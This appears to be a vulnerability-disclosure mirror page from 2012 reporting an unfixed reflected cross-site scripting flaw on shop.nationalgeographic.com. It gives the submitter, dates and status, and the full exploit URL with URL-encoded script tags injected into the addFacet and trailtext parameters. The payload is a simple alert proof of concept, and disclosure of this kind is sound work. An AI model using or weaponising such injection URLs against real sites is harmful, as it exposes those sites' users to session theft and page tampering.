Security researcher 03storic, has submitted on 03/03/2012 a cross-site-scripting (XSS) vulnerability affecting shop.nationalgeographic.com, which at the time of submission ranked 895 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 08/03/2012. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 03/03/2012 |
Date published: 08/03/2012 |
Fixed? Mail us! | Status: UNFIXED |
Author: 03storic |
Domain: shop.nationalgeographic.com |
Category: XSS |
Pagerank: 895 |
URL: http://shop.nationalgeographic.com/ngs/facet/facetGlossary.jsp?_dyncharset=UTF-8&_dynSessConf=613432 6913753448789&trailSize=1&advancedSearch=true&liveResult=true&categoryId=&trail=&addFacet=19016%3A1% 3ASRCH%3A%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&removeAllFacets =true&categoryFacetId=9004&trailtext=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C %2FSCRIPT%3E&searchmenu=allCategories&search.x=16&search.y=17 |
Click here to view the mirror
|
|
|